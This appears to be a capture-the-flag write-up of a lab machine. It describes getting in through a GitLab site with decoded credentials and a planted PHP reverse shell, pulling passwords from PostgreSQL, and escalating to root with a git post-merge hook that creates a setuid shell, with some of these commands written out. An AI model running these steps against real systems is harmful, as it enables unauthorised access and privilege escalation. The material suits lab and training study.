Machine IP: 10.10.10.114
DATE : 20/09/2019
START TIME: 8:05 PM
I’ve got two open port. Let’s start our enumeration with HTTP service.
When we visit the website we get the login page as similar to what we get when we try to login in
On the footer we can see 3 links.
About GitLab takes us to
about.gitlab.com so that is obviously not our vector. The other two options are linked to machine IP so I clicked on
help and it gave up a directory listing.
I opened that
bookmark.html and it had few other links.
I took all the hex value and conveted them to strings using python.
['value', 'user_login', 'getElementById', 'clave', 'user_password', '11des0081x']
So now we have the username and password.
After login We can see that there are two profile options.
I choosed the
Administrator/profile and it had lot of
shell.php so most probably those were shell for other people working on the server 😄😄. I encountered a very funny name.
I edited the
index.php with the
pentest monkey php reverse shell and then visited the
/settings which triggered the reverse shell.
I looked around couldn’t find anything, @theart42 said look around the Gitlab interface there I found a snippet for
So now we know that there is a table called
profiles and the credential for postgress is
@theart42 told me that there is psql service running. I did
netstat -antp and notice the default port for postgresql was open i.e
5432 port was open.
The problem is that this is running in side a docker.
We need to forward the port to the machine so we can connect to it. I tried using
nc for portforwarding but that didn’t worked so I had to start metasploit listener because it have a option to portforward.
I started the msf listener with the following options:
portfwd add -l 5432 -p 5432 -r 127.0.0.1
Once this is done type
shell and then run the following command:
psql -h 127.0.0.1 -U profiles -W
Now we can go to
profiles tabe and get the password for clave.
NOTE: I didn’t use the clave account to root it. So in a way you don’t even have to go to user.
There is a
RemoteConnection.exe that we need to reverse which might give us the option to root this machine. The problem was that I couldn’t figure out how to do it.
Privilege escalation (using git pull)
I found out that
www-data have sudo privileges.
www-data can run
git pull as
root. We can use this with the help of
hook (post-merge) in git. To do this first move the
I moved the
profiles remove to
$ cp /var/www/html/profile /tmp/
After that we need to make a hook in
echo '#!/bin/sh' > post-merge echo 'cp /bin/sh /tmp' >> post-merge echo 'chown root:root /tmp/sh' >> post-merge echo 'chmod 4755 /tmp/sh' >> post-merge
We are doing this because we want all this to happen after the merge(
post-merge). This hook will make a
sh file in
/tmp and then we can use that to give ourself a root shell.
Now we need to add a new file and then merge it to the repo. But make sure one to check the
Remove source branch after merge.
Also check that while making the merge
Merge that request and then in the
sudo -u root git pull
and now we can get the root flag.
This was a beginner level machine since the only issue one might have is in running the RCE exploit.
Thanks to askar for making this machine.
Thanks for reading, Feedback is always appreciated.